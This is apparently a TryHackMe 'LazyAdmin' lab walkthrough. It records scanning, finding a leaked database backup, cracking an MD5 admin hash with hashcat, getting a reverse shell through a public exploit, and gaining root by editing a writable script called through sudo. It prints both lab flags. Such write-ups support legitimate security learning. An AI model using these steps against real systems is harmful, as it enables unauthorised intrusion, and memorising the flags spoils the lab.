LazyAdmin

THM LazyAdmin

What is the user flag?

nmap -sV 10.82.188.170
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-21 13:49 +0000
Nmap scan report for 10.82.188.170
Host is up (0.022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


gobuster dir -u 10.82.188.170 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp

/content              (Status: 301) [Size: 316] [--> http://10.82.188.170/content/]

dirb http://10.82.188.170 -R

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 21 14:08:18 2025
URL_BASE: http://10.82.188.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Interactive Recursion

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.82.188.170/ ----
==> DIRECTORY: http://10.82.188.170/content/
+ http://10.82.188.170/index.html (CODE:200|SIZE:11321)
+ http://10.82.188.170/server-status (CODE:403|SIZE:278)

---- Entering directory: http://10.82.188.170/content/ ----
(?) Do you want to scan this directory (y/n)? y     ==> DIRECTORY: http://10.82.188.170/content/_themes/
==> DIRECTORY: http://10.82.188.170/content/as/
==> DIRECTORY: http://10.82.188.170/content/attachment/
==> DIRECTORY: http://10.82.188.170/content/images/
==> DIRECTORY: http://10.82.188.170/content/inc/
+ http://10.82.188.170/content/index.php (CODE:200|SIZE:2199)
==> DIRECTORY: http://10.82.188.170/content/js/

---- Entering directory: http://10.82.188.170/content/_themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/ ----
(?) Do you want to scan this directory (y/n)? y     + http://10.82.188.170/content/as/index.php (CODE:200|SIZE:3678)
==> DIRECTORY: http://10.82.188.170/content/as/js/
==> DIRECTORY: http://10.82.188.170/content/as/lib/

---- Entering directory: http://10.82.188.170/content/attachment/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Dec 21 14:12:52 2025
DOWNLOADED: 13836 - FOUND: 4

Looks like we have a login page on /content/as/ and digging around /content/inc we find /content/inc/mysql_backup/ which has a MySQL db sitting there

cat mysql.sql
...
"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"
...

hash-identifier 42f749ade7f9e195bf475f37a44cafcb

Looks like we might have a MD5 hash, lets try see what hashcat gives us

hashcat -a 0 -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt --show

Great, looks like we can get into the /content/as/ page using manager and the password we got from hashcat

Now lets try using one of the exploits on ExploitDB to get a reverse shell

Now we have our reverse shell in /content/inc/ads/ we can click it or curl it to get a shell

nc -lvnp 4444

I'm going to upgrade to full tty to make looking around less of a pain

Looks like we have /home/itguy/user.txt

We have our user flag THM{63e5bce9271952aad1113b6f1ac28a07}

What is the root flag?

 sudo -ll
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
    /usr/bin/perl /home/itguy/backup.pl

Looks like there's a Perl script we can run as root, only issue is we only have read access to the file, however the script looks to call another script at /etc/copy.sh which we do have write access to

It looks like there's already a reverse shell in there so lets just change that to our IP and port and run it

sudo /usr/bin/perl /home/itguy/backup.pl


nc -lvnp 4445
listening on [any] 4445 ...
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 60014

and we now have root access

checking /root we have /root/root.txt

Final flag THM{6637f41d0177b6f37cb20d775124699f}